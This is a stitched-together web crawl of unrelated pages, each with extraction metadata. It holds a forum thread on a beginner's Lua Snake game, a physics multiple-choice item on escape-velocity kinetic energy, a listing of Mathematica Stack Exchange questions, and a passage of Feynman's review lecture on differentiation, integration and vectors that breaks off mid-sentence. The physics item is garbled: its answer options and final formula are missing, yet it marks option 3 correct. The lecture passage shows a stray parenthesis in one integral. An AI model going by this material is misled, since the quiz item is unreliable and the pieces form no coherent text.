go all out, it took about a week of programming. i didnt know anything about Lua, cuz i normally program in c#. Jack wrote:I really like the font & tile style .... great job on the graphics... Tesselode wrote:The game has had some unofficial releases, and you just did a pretty good recreation of it. Nice job! thanks guys, im really glad ya'll are liking it and btw, im not trying to "recreation" it per-say, i really used it as inspiration. i know it looks very similar, so im not taking credit for the design or anything lol. we can call it more of a clone i guess, but its not going to be to the same extent (levels, multi-player, networking; i think, etc) just wanting it to be a unlimited style play Tesselode wrote:Can you make the snake's movement a little smoother? hm, i did notice in their game that it smoothly moved from block to block, but i don't know where to start with that, but i will see. saved by a scholarship.. redesigned my "avatar" awhite92 Prole Posts: 21 Joined: Thu Jul 26, 2012 4:25 am GAME UPDATED GAME UPDATED see first post for details. saved by a scholarship.. redesigned my "avatar" Lafolie Inner party member Posts: 804 Joined: Tue Apr 05, 2011 2:59 pm Location: SR388 Contact: Re: My First Game, Snake I'm getting > 360fps on my lesser gpu. This is pretty slick for a first project, keep it up. Do you recognise when the world won't stop for you? Or when the days don't care what you've got to do? When the weight's too tough to lift up, what do you? Don't let them choose for you, that's on you. awhite92 Prole Posts: 21 Joined: Thu Jul 26, 2012 4:25 am Re: My First Game, Snake Lafolie wrote:I'm getting > 360fps on my lesser gpu. This is pretty slick for a first project, keep it up. that's good i was wandering how it would be on other PCs, and thanks i will and i am! saved by a scholarship.. redesigned my "avatar" Roland_Yonaba Inner party member Posts: 1562 Joined: Tue Jun 21, 2011 6:08 pm
2019-07-23 03:11:21
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26383909583091736, "perplexity": 5110.716028189324}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195528687.63/warc/CC-MAIN-20190723022935-20190723044935-00430.warc.gz"}
https://learn.careers360.com/engineering/question-solve-this-problem-the-kinetic-energy-needed-to-project-a-body-of-mass-m-from-the-earth-surface-radius-r-to-infinity-is/
#### The kinetic energy needed to project a body of  mass m from the earth surface (radius R) to infinity is Option 1) Option 2) Option 3) Option 4) As we learnt in Escape velocity ( in terms of radius of planet) - Escape velocity - wherein • depends on the reference body • greater the value of  or  greater will be the escape velocity   For earth $\dpi{100} v_{e}=\sqrt{2gR}$ Kinetic Energy = Option 1) This option is incorrect. Option 2) This option is incorrect. Option 3) This option is correct. Option 4) This option is incorrect.
2023-03-29 20:05:43
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 1, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9227010011672974, "perplexity": 7004.8730189960515}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949025.18/warc/CC-MAIN-20230329182643-20230329212643-00049.warc.gz"}
http://mathematica.stackexchange.com/questions?page=67&sort=faq&pagesize=50
# All Questions 217 views ### Importation multiple dcm images [duplicate] I'm extremely new to Mathematica. I want to import 201 .dcm (DICOM) files into Mathematica 9. Is there a way to do this which doesn't require my doing it an image at a time? My ultimate need to is to ... 235 views ### Attempting to use NDSolve to plot harmonic oscillator solutions NDSolve[{ (-y''[r]/1880) + (470 (0.04077)^2 r^2 - 48 + 1/(1880 r^2)) y[r] == 0, y[0] = 0, y'[0] = 0}, y, {r, -4, 4}] I use this but get errors and am ... 296 views ### Extracting information from list I have a huge list that looks like this: ... 531 views ### EdgeRenderingFunction question Bug introduced in 9.0 and fixed in 10.0.0 (Edit 1 : I added this paragraph after the original post, for context) Some context for this question can be found in another post (http://mathematica.... 210 views ### How to place more than one ChartLabel in a BarChart I have the following data: ... 109 views ### Entering an differential equation in a Manipulate box Does anyone have an example of a Manipulate demonstration where the user can type into a box the differential equation, time interval, initial condition, and the result is plotted? This possible in ... 1k views ### Adding an image background to a graph that uses vertexposition Hello Mathematica stackexchange community! I need your help on a research project. I'm looking to create a graph g with vertices in specifies places and then use an image I have as the background of ... 2k views ### How to find intersection points of lines? Considering I have three functions f1 = -x + 1; f2 = x - 1; f3 = x + 3; How can I find the intersection points of this functions? Thanks. This didn't work <... 858 views ### Using Array Elements as Function Arguments Suppose I have an array p = {a,b,c,d} and a function f that takes a variable number of arguments. I want to evaluate ... 4k views ### Stategies to avoid NIntegrate::slwcon error I am trying to numerically evaluate an integral whose integrand depends on two parameters, say $(a,b)$ and when $b\gg 1$ I suspect (although it's not guaranteed) that the integrand is very small. Thus ... 658 views ### Changing FrontEnd automatic scrolling in version 8 In Mathematica versions < 8, the FrontEnd has a very intelligent behavior: On evaluation, it by default automatically scrolls down the Notebook window to the last printed Output cell but also ... 299 views ### Incorrect Timing of Total For demonstrating how fast C-compiled functions can be, in one of my courses I use the following function for finding the sum of a list of reals: ... 423 views ### Unexpected result {“.a”, “co”, “.m”} from Sort[{“.m”, “.a”, “co”}] I came across the following situation: Evaluating Sort[{".m", ".a", "co"}] Results in {".a", "co", ".m"} I wondering: ... 611 views ### How do I introduce a new variable in a trigonometric equation? I have the trigonometric equation \begin{equation*} \sin^8 x + 2\cos^8 x -\dfrac{1}{2}\cos^2 2x + 4\sin^2 x= 0. \end{equation*} By putting $t = \cos 2x$, I have \begin{equation*} \dfrac{3}{16} t^4+ \... 1k views ### Insphere for Irregular Tetrahedron I am looking for existing Mathematica code to compute the unique sphere inscribed inside an irregular tetrahedron. I can write it myself, but I would love to find that someone already performed this ... 6k views ### Plotting vectors originating from the origin in 3D I have an array of data with 3D elements. Ex: x = {{1,2,3}, {3,4,5}, {5,6,7}}. I want to show this data in 3 dimensions, such that each point in the space is shown ... 302 views ### RegionPlot returning a number Bug introduced in 10.0 and persisting through 10.4 or later I had updated my mathematica to version 10 few days ago. And I had been shocked by the following fact: ... 271 views ### A bug in Commonest in version 10 Bug introduced in 10.0.0 and fixed in 10.0.2 m_goldberg demonstrated that in Mathematica 10 Commonest does not behave as the documentation indicates that it will.... 324 views ### Why does Mathematica simplify $x/x\to1$? If I enter x/x, I get 1. Such behavior leads to this: Simplify[D[Sqrt[x^2], x, x]] 0 ... 462 views ### Strange behaviour of Reduce for Mod[x,1] For every integer $x$ the equation Mod[x, 1] == 0 holds. While Simplify[Mod[x, 1] == 0, Element[x,Integers]] gives ... 951 views ### How to remove accents from text? I would like to know how I can remove accents from a string. For example, how can I transform "string test áéíóú" into ... 449 views Bug still present in version 10 under Windows. In a recent posting, Belisarius solved a problem related to the display of arrows on the x and y axes by setting ... 463 views ### Why do NumberForm and Round apparently use different tie-breaking methods? When rounding numbers (for example, rounding a real number to the nearest integer), the "round to nearest" rule is usually used. For example, 1.4 is rounded down to 1 and 1.6 is rounded up to 2. ... 650 views ### How would I return a random Mathematica command? I'm doing some metaprogramming. How would I make a Mathematica function that returns a random Mathematica command? Is there a list of command names that I could use ... 777 views ### How do I “start a reference system”? When I attempt to insert a citation or specify a database to use as a bibliography, I get a message that I need to "start" the "reference system" "manually": I have no idea what a references system ... 377 views ### FindInstance returns Indeterminate in version 9, but not in 8 Bug introduced in 9.0 and fixed in 10.0.0 Here is a trivial system of equations in three unknowns for which FindInstance obtains a solution: ... 577 views ### How to embed an image into a string? Note: The bug described in the post is in Mathematica 9, and has been fixed in 10.0. The documentation for String contains the following statements: Strings ... 826 views ### Does $x>0$ imply that $x\in\mathbb{R}$? Let’s assume I input Assuming[x > 0, expression] Is it assumed by Mathematica that $x$ is a real number? Or that the real part of $x$ is positive? Something ... 828 views ### Problems with “Test Connectivity” and the Pacletserver I know there has been a similar questions to this already but the solution did not work for me so here again: I have internet connection and I can execute such commands like: ... 337 views ### ToNumberField won't recognize Root as an explicit algebraic number Bug fixed in 10.0.0 In Mathematica 9.0.1, it appears that ToNumberField will not always recognize a Root object as an ... 2k views ### How do I find the degree of a multivariable polynomial automatically? I have a very simple question which appears not to have already been answered on this forum. Is there built-in functionality that returns the degree of a multivariable polynomial? For example if the ... 543 views ### Evaluation indicator for a notebook I have a GUI with a number of TabView and other Manipulate controls. Sometimes clicking from one tab view to the other can take ... 344 views I have a ragged list ragged = {{a,b,c,d,e},{x,y,z}} that I would like to trim (on the right) to be rectangular. The desired result is ... 1k views ### Why is ListDensityPlot unable to plot datasets with extreme ranges Consider the following dataset: data = Flatten[ Table[{x 10^-9, y 10^-9, x^2 + y^2},{x, -100, 100, 10}, {y, -100,100, 10}] , 1]; If I try to ... 832 views ### Why can't I change the value of MaxRecursion in NIntegrate when integrating BesselJ? Bug introduced in 8.0.4 or earlier and persists through 10.4. I am trying to evaluate this integral numerically $$\int_0^{\infty } J_0(q R) \tanh(q) \, \mathrm{d}q$$ for large values of $R$. ... 284 views ### Evaluate selection in new window or new notebook? Sometimes when you have long code you need to check some part of this code. the way I am using currently is to selected the part that I want and then copy it to new notebook and then evaluate it ... 138 views ### Strange result of Reduce and ForAll In the question Can Mathematica tell me if a polynomial has all real roots?, quite a few of interesting answers were given. I wanted to add another one, using quantors, and observed some strange ... 566 views ### How can I highlight a moving bar in an animation of a bar chart? I wrote the following code, but I don't know how to highlight the moving bar. ... 394 views ### Memory leak in FE? A very abridged example of what was originally a major leak ... 459 views 502 views ### Modelling the effect of a structure on a “tsunami” (hyperbolic wave equation) So, the hyperbolic wave equation can be quite easily solved in Mathematica like this: ... 265 views ### How to pass composite function list to SortBy? In order to sort alphanumeric-as-string data of the form {"T3", "T14", "T1", "E2"}, so that "T14" comes after ...
2016-07-01 15:35:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6627802848815918, "perplexity": 2004.6251855965022}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783403502.46/warc/CC-MAIN-20160624155003-00080-ip-10-164-35-72.ec2.internal.warc.gz"}
https://www.feynmanlectures.caltech.edu/TIPS_01.html
◄ ▲ ► A A A MATHJAX https://www.feynmanlectures.caltech.edu/I_01.html If it does not open, or only shows you this message again, then please let us know: • which browser you are using (including version #) • which operating system you are using (including version #) This type of problem is rare, and there's a good chance it can be fixed if we have some clues about the cause. So, if you can, after enabling javascript, clearing the cache and disabling extensions, please open your browser's javascript console, load the page above, and if this generates any messages (particularly errors or warnings) on the console, then please make a copy (text or screenshot) of those messages and send them with the above-listed information to the email address given below. By sending us information you will be helping not only yourself, but others who may be having similar problems accessing the online edition of The Feynman Lectures on Physics. Your time and consideration are greatly appreciated. Best regards, Mike Gottlieb mg@feynmanlectures.info Editor, The Feynman Lectures on Physics New Millennium Edition The recording of this lecture is missing from the Caltech Archives. ## 1Prerequisites—Review Lecture A (There was no summary for this lecture.) (There was no summary for this lecture.) ### 1–1Introduction to the review lectures These three optional lectures are going to be dull: they go over the same material that we went over before, adding absolutely nothing. So I’m very surprised to see so many people here. Frankly, I had rather hoped there would be fewer of you, and that these lectures wouldn’t be necessary. The purpose of relaxing at this time is to give you time to think about things, to piddle around with the things that you heard about. That’s by all odds the most effective way of learning the physics: it’s not a good idea to come in and listen to some review; it’s better to make up the review for yourself. So I’d advise you—if you’re not too far lost, completely befuddled and confused—that you forget about these lectures and piddle around by yourself, and try to find out what’s interesting without grinding down some particular track. You’ll learn infinitely better and easier and more completely by picking a problem for yourself that you find interesting to fiddle around with—some kind of a thing that you heard that you don’t understand, or you want to analyze further, or want to do some kind of a trick with—that’s the best way to learn something. The lectures that we have been giving so far are a new course, and have been designed to answer a problem we presumed existed: nobody knows how to teach physics, or to educate people—that’s a fact, and if you don’t like the way it’s being done, that’s perfectly natural. It’s impossible to teach satisfactorily: for hundreds of years, even more, people have been trying to figure out how to teach, and nobody has ever figured it out. So if this new course is not satisfactory, that’s not unique. At Caltech we are always changing the courses in the hope of improving them, and this year we changed the physics course again. One of the complaints in the past was that the students who are nearer the top find the whole subject of mechanics dull: they would find themselves grinding along, doing problems, studying reviews, and doing examinations, and there was no time to think about anything; there was no excitement in it; there was no description of its relation to modern physics, or anything like that. And so this set of lectures was designed to be better that way, to a certain extent, to help out those fellows, and to make the subject more interesting, if possible, by connecting it to the rest of the universe. On the other hand, this approach has the disadvantage that it confuses many people, because they don’t know what it is they’re supposed to learn—or, rather, that there’s so much stuff that they can’t learn all of it, and they haven’t got enough intelligence to figure out what is interesting to them, and to pay attention only to that. Therefore, I’m addressing myself to those people who have found the lectures very confusing, very annoying, and irritating, in the sense that they don’t know what to study, and they’re kind of lost. The other people, who don’t feel as lost, shouldn’t be here, so I now give you the opportunity to go out...1 I see nobody has the nerve. Or I guess I’m a great failure, then, if I got everybody lost! (Maybe you’re just here for entertainment.) ### 1–2Caltech from the bottom Now, I am therefore imagining that one of you has come into my office and said, “Feynman, I listened to all the lectures, and I took that midterm exam, and I’m trying to do the problems, and I can’t do anything, and I think I’m in the bottom of the class, and I don’t know what to do.” What would I say to you? The first thing I would point out is this: to come to Caltech is an advantage in certain ways, and in other ways a disadvantage. Some of the ways that it’s an advantage you probably once knew, but now forget, and they have to do with the fact that the school has an excellent reputation, and the reputation is well deserved. There are pretty good courses. (I don’t know about this particular physics course; of course I have my own opinion about it.) The people who have come out the other end of Caltech, when they go into industry, or go to do work in research, and so forth, always say that they got a very good education here, and when they compare themselves with people who have gone to other schools (although many other schools are also very good) they never find themselves behind and missing something; they always feel they went to the best school of them all. So that’s an advantage. But there is also a certain disadvantage: because Caltech has such a good reputation, almost everybody who’s the first or second in his high school class applies here. There are lots of high schools, and all the very best men2 apply. Now, we have tried to figure out a system of selection, with all kinds of tests, so that we get the best of the best. And so you guys have been very carefully picked out from all these schools to come here. But we’re still working on it, because we’ve found a very serious problem: no matter how carefully we select the men, no matter how patiently we make the analysis, when they get here something happens: it always turns out that approximately half of them are below average! Of course you laugh at this because it’s self-evident to the rational mind, but not to the emotional mind—the emotional mind can’t laugh at this. When you’ve lived all the time as number one or number two (or even possibly number three) in high school science, and when you know that everybody who’s below average in the science courses where you came from is a complete idiot, and now you suddenly discover that you are below average—and half of you guys are—it’s a terrible blow, because you imagine that it means you’re as dumb as those guys used to be in high school, relatively. That’s the great disadvantage of Caltech: that this psychological blow is so difficult to take. Of course, I’m not a psychologist; I’m imagining all this. I don’t know how it would really be, of course! The question is what to do if you find you’re below average. There are two possibilities. In the first place, you could find that it’s so difficult and annoying that you have to get out—that’s an emotional problem. You can apply your rational mind to that and point out to yourself what I just pointed out to you: that half of the guys in this place are going to be below average, even though they’re all tops, so it doesn’t mean anything. You see, if you can stick out that nonsense, that funny feeling, for four years, then you’ll go out into the world again, and you’ll discover that the world is just like it used to be—that when, for example, you get a job somewhere, you’ll find you’re Number One Man again, and you’ll get the great pleasure of being the expert they all come running to in this particular plant whenever they can’t figure out how to convert inches to centimeters! It’s true: the men who go out into industry, or go to a small school that doesn’t have an excellent reputation in physics, even if they’ve been in the bottom third, the bottom fifth, the bottom tenth of the class—if they don’t try to drive themselves (and I’ll explain that in a minute), then they’ll find themselves very much in demand, that what they learned here is very useful, and they’re back where they were before: happy, Number One. On the other hand you can make a mistake: some people may drive themselves to a point where they insist they have to become Number One, and in spite of everything they want to go to graduate school and they want to become the best Ph.D. in the best school, even though they’re starting out at the bottom of the class here. Well, they are likely to be disappointed and to make themselves miserable for the rest of their lives being always at the bottom of a very first-rate group, because they picked that group. That’s a problem, and that’s up to you—it depends on your personality. (Remember, I’m talking to the guy who came into my office because he’s in the lowest tenth; I’m not talking to the other fellows who are happy because they happen to be in the upper tenth—that’s a minority anyway!) So, if you can take this psychological blow—if you can say to yourself, “I’m in the lower third of the class, but a third of the guys are in the lower third of the class, because it’s got to be that way! I was the top guy in high school, and I’m still a smart son-of-a-gun. We need scientists in the country, and I’m gonna be a scientist, and when I get out of this school I’ll be all right, damn it! And I’ll be a good scientist!”—then it’ll be true: you will be a good scientist. The only thing is whether you can take the funny feelings during these four years, in spite of the rational arguments. If you find you can’t take the funny feelings, I suppose the best thing to do is to try to go somewhere else. It’s not a point of failure; it’s simply an emotional thing. Even if you’re one of the last couple of guys in the class, it doesn’t mean you’re not any good. You just have to compare yourself to a reasonable group, instead of to this insane collection that we’ve got here at Caltech. Therefore, I am making this review purposely for the people who are lost, so that they have still a chance to stay here a little longer to find out whether or not they can take it, okay? I make now one more point: that this is not a preparation for an examination, or anything like that. I don’t know anything about the examinations—I mean, I have nothing to do with making them up, and I don’t know what’s going to be on them, so there’s no guarantee whatsoever that what’s on the examination is only going to deal with the stuff reviewed in these lectures, or any nonsense of that kind. ### 1–3Mathematics for physics So, this guy comes into my office and asks me to try to make everything straight that I taught him, and this is the best I can do. The problem is to try to explain the stuff that was being taught. So I start, now, with the review. I would tell this guy, “The first thing you must learn is the mathematics. And that involves, first, calculus. And in calculus, differentiation.” Now, mathematics is a beautiful subject, and has its ins and outs, too, but we’re trying to figure out what the minimum amount we have to learn for physics purposes are. So the attitude that’s taken here is a “disrespectful” one towards the mathematics, for sheer efficiency only; I’m not trying to undo mathematics. What we have to do is to learn to differentiate like we know how much is 3 and 5, or how much is 5 times 7, because that kind of work is involved so often that it’s good not to be confounded by it. When you write something down, you should be able to immediately differentiate it without even thinking about it, and without making any mistakes. You’ll find you need to do this operation all the time—not only in physics, but in all the sciences. Therefore differentiation is like the arithmetic you had to learn before you could learn algebra. Incidentally, the same goes for algebra: there’s a lot of algebra. We are assuming that you can do algebra in your sleep, upside down, without making a mistake. We know it isn’t true, so you should also practice algebra: write yourself a lot of expressions, practice them, and don’t make any errors. Errors in algebra, differentiation, and integration are only nonsense; they’re things that just annoy the physics, and annoy your mind while you’re trying to analyze something. You should be able to do calculations as quickly as possible, and with a minimum of errors. That requires nothing but rote practice—that’s the only way to do it. It’s like making yourself a multiplication table, like you did in elementary school: they’d put a bunch of numbers on the board, and you’d go: “This times that, this times that,” and so on—Bing! Bing! Bing! ### 1–4Differentiation In the same way you must learn differentiation. Make a card, and on the card write a number of expressions of the following general type: for example, \begin{aligned} &1+6t\\[.5ex] &4t^2+2t^3\\[.5ex] &(1+2t)^3\\[.5ex] &\sqrt{1+5t}\\[.5ex] &(t+7t^2)^{1/3} \end{aligned} \label{Eq:TIPS:1:1} and so on. Write, say, a dozen of these expressions. Then, every once in a while, just take the card out of your pocket, put your finger on an expression, and read out the derivative. In other words, you should be able to see right away: \begin{aligned} \ddt{}{t}(1+6t) &= 6 \small\textit{ Bing!}\\[1ex] \ddt{}{t}(4t^2+2t^3) &= 8t+6t^2 \small\textit{ Bing!}\\[1ex] \ddt{}{t}(1+2t)^3 &= 6(1+2t)^2 \small\textit{ Bing!} \end{aligned} \label{Eq:TIPS:1:2} See? So the first thing to do is to memorize how to do derivatives—cold. That’s a necessary practice. Now, for differentiating more complicated expressions, the derivative of a sum is easy: it’s simply the sum of the derivatives of each separate summand. It isn’t necessary at this stage in our physics course to know how to differentiate expressions any more complicated than those above, or sums of them, so that in the spirit of this review, I shouldn’t tell you any more. But there is a formula for differentiating complicated expressions, which is usually not given in calculus class in the form that I’m going to give it to you, and it turns out to be very useful. You won’t learn it later, because nobody will ever tell it to you, but it’s a good thing to know how to do. Suppose I want to differentiate the following: $$\label{Eq:TIPS:1:3} \frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}} + \frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}$$ Now, the question is how to do it with dispatch. Here’s how you do it with dispatch. (These are just rules; it’s the level to which I’ve reduced the mathematics, because we’re working with the guys who can barely hold on.) Watch! You write the expression down again, and after each summand you put a bracket: \begin{aligned} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot\Bigg[\\[.5ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \end{aligned} \label{Eq:TIPS:1:4} Next, you’re going to write something inside the brackets, such that when you’re all finished, you’ll have the derivative of the original expression. (That’s why you write the expression down again, in case you don’t want to lose it.) Now, you look at each term and you draw a bar—a divider—and you put the term in the denominator: The first term is $1+2t^2$ that goes in the denominator. The power of the term goes in front (it’s the first power, $1$), and the derivative of the term (by our practice game), $4t$, goes in the numerator. That’s one term: \begin{aligned} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot\Bigg[1\frac{4t}{1+2t^2}\\[.5ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \end{aligned} \label{Eq:TIPS:1:5} (What about the $6$? Forget it! Any number in front doesn’t make any difference: if you wanted to, you could start out, “$6$ goes in the denominator; its power, $1$, goes in front; and its derivative, $0$, goes in the numerator.”) Next term: $t^3-t$ goes in the denominator; the power, $+2$, goes in front; the derivative, $3t^2-1$, goes in the numerator. The next term, $t+5t^2$ goes in the denominator; the power, $-1/2$ (the inverse square root is a negative half power), goes in front; the derivative, $1+10t$, goes in the numerator. The next term, $4t$, goes in the denominator; its power, $-3/2$, goes in front; its derivative, $4$, goes in the numerator. Close the bracket. That’s one summand: \begin{aligned} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot\Bigg[ 1\frac{4t}{1+2t^2} + 2\frac{3t^2-1}{t^3-t} -\frac12\frac{1+10t}{t+5t^2} - \frac32\frac4{4t}\Bigg]\\[.5ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \end{aligned} \label{Eq:TIPS:1:6} \begin{alignedat}{2} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot&&\Bigg[ 1\frac{4t}{1+2t^2}+2\frac{3t^2-1}{t^3-t}\\[.25ex] & &&-\frac12\frac{1+10t}{t+5t^2} - \frac32\frac4{4t}\Bigg]\\[.75ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \end{alignedat} \label{Eq:TIPS:1:6} Next summand, first term: the power is $+1/2$. The object whose power we’re taking is $1+2t$, the derivative is $2$. The power of the next term, $t+\sqrt{1+t^2}$, is $-1$. (You see, it’s a reciprocal.) The term goes in the denominator, and its derivative (this is the only hard one, relatively) has two pieces, because it’s a sum: $1+\cfrac{1}{2}\dfrac{2t}{\sqrt{1+t^2}}$. Close the bracket: \begin{aligned} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot\Bigg[ 1\frac{4t}{1+2t^2} + 2\frac{3t^2-1}{t^3-t} -\frac12\frac{1+10t}{t+5t^2} - \frac32\frac4{4t}\Bigg]\\[.5ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \frac12\frac2{(1+2t)} - 1\frac{1+\cfrac12\dfrac{2t}{\sqrt{1+t^2}}}{t+\sqrt{1+t^2}}\Bigg] \end{aligned} \label{Eq:TIPS:1:7} \begin{alignedat}{2} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot&& \Bigg[ 1\frac{4t}{1+2t^2}+2\frac{3t^2-1}{t^3-t}\\[.25ex] & &&-\frac12\frac{1+10t}{t+5t^2} - \frac32\frac4{4t}\Bigg] &&\\[.75ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \frac12&&\frac2{(1+2t)}\\ & &&- 1\frac{1+\cfrac12\dfrac{2t}{\sqrt{1+t^2}}}{t+\sqrt{1+t^2}}\Bigg] \end{alignedat} \label{Eq:TIPS:1:7} That’s the derivative of the original expression. So, you see, that by memorizing this technique, you can differentiate anything—except sines, cosines, logs, and so on, but you can learn the rules for those easily; they’re very simple. And then you can use this technique even when the terms include tangents and everything else. I noticed when I wrote it down you were worried that it was such a complicated expression, but I think you can appreciate now that this is a really powerful method of differentiation because it gives the answer—boom—without any delay, no matter how complicated. The idea here is that the derivative of a function $f = k\cdot u^a\cdot v^b\cdot w^c\dots$ with respect to $t$ is $$\label{Eq:TIPS:1:8} \ddt{f}{t} = f\cdot\Bigg[a\frac{du/dt}{u}+b\frac{dv/dt}{v}+c\frac{dw/dt}{w}+\dots\Bigg]$$ (where $k$ and $a, b, c\dots$ are constants). However, in this physics course, I doubt any of the problems will be that complicated, so we probably won’t have any opportunity to use this. Anyway, that’s the way I differentiate, and I’m pretty good at it now, so there we are. ### 1–5Integration Now, the opposite process is integration. You should equally well learn to integrate as rapidly as possible. Integration is not as easy as differentiation, but you should be able to integrate simple expressions in your head. It isn’t necessary to be able to integrate every expression; for example, $(t+7t^2)^{1/3}$ is not possible to integrate in an easy fashion, but the others below are. So, when you choose expressions to practice integration, be careful that they can be done easily: \begin{aligned} \int (1+6t)\,dt &= t + 3t^2\\[.5ex] \int (4t^2 + 2t^3)\,dt &=\frac{4t^3}3+\frac{t^4}2\\[.5ex] \int (1+2t)^3\,dt &= \frac{(1+2t)^4)}8\\[.5ex] \int \sqrt{1+5t}\,dt &= \frac{2(1+5t)^{3/2}}{15}\\[.5ex] \int (t+7t^2)^{1/3}\,dt &= \text{???.} \end{aligned} \label{Eq:TIPS:1:9} I have nothing more to tell you about calculus. The rest is up to you: you have to practice differentiation and integration—and, of course, the algebra required to reduce horrors like Eq. (1.7). Practicing algebra and calculus in this dull way—that’s the first thing. ### 1–6Vectors The other branch of the mathematics that we’re involved in as a pure mathematical subject is vectors. You first have to know what vectors are, and if you haven’t got a feel for it, I don’t know what to do: we’d have to talk back and forth a while for me to appreciate your difficulty—otherwise I couldn’t explain. A vector is like a push that has a certain direction, or a speed that has a certain direction, or a movement that has a certain direction—and it’s represented on a piece of paper by an arrow in the direction of the thing. For instance, we represent a force on something by an arrow that is pointing in the direction of the force, and the length of the arrow is a measure of the magnitude of the force in some arbitrary scale—a scale, however, which must be maintained for all the forces in the problem. If you make another force twice as strong, you represent that by an arrow twice as long. (See Fig. 1–1.) Now, there are operations that can be done with these vectors. That is, if there are two forces acting at the same time on an object—say, two people are pushing on a thing—then the two forces can be represented by two arrows $\FLPF$ and $\FLPF'$. When we draw a diagram of something like this, it is often convenient to place the tails of the arrows where the forces are applied, even though in general there’s no meaning to the location of vectors. (See Fig. 1–2.) If we want to know the net resultant force, or total force, that corresponds to adding the vectors, and we can draw this by moving the tail of one onto the head of the other. (They’re still the same vectors after you move them because they have the same direction and the same length.) Then $\FLPF+\FLPF'$ is the vector drawn from the tail of $\FLPF$ to the head of $\FLPF'$ (or from the tail of $\FLPF'$ to the head of $\FLPF$), as shown in Figure 1–3. This way of adding vectors is sometimes called the “parallelogram method.” On the other hand, suppose there are two forces acting on an object, but we only know one of them is $\FLPF'$; the other one, which we don’t know, we’ll call $\FLPX$. Then, if the total force on the object is known to be $\FLPF$, we have $\FLPF'+\FLPX = \FLPF$. And so, $\FLPX=\FLPF-\FLPF'$. Thus to find $\FLPX$ you have to take the difference of two vectors, and you can do that in either of two ways: you can take $-\FLPF'$, which is a vector in the opposite direction as $\FLPF'$ and add it to $\FLPF$. (See Fig. 1–4.) Otherwise $\FLPF-\FLPF'$, is simply the vector drawn from the head of $\FLPF'$ to the head of $\FLPF$. Now, the disadvantage of the second method is that you may have a tendency to draw the arrow as shown in Figure 1–5; although the direction and length of the difference is right, the application of the force is not located at the tail of the arrow—so watch out. In case you’re nervous about it, or there’s any confusion, use the first method. (See Fig. 1–6.) We can also project vectors in certain directions. For example, if we would like to know what the force is in the ‘$x$’ direction (called the component of the force in that direction) it’s easy: we just project $\FLPF$ down with a right angle onto the $x$ axis, and that gives the component of the force in that direction, which we call $F_x$. Mathematically, $F_x$ is the magnitude of $\FLPF$ (which I’ll write $|\FLPF|$) times the cosine of the angle that $\FLPF$ makes with the $x$ axis; this comes from the properties of the right triangle. (See 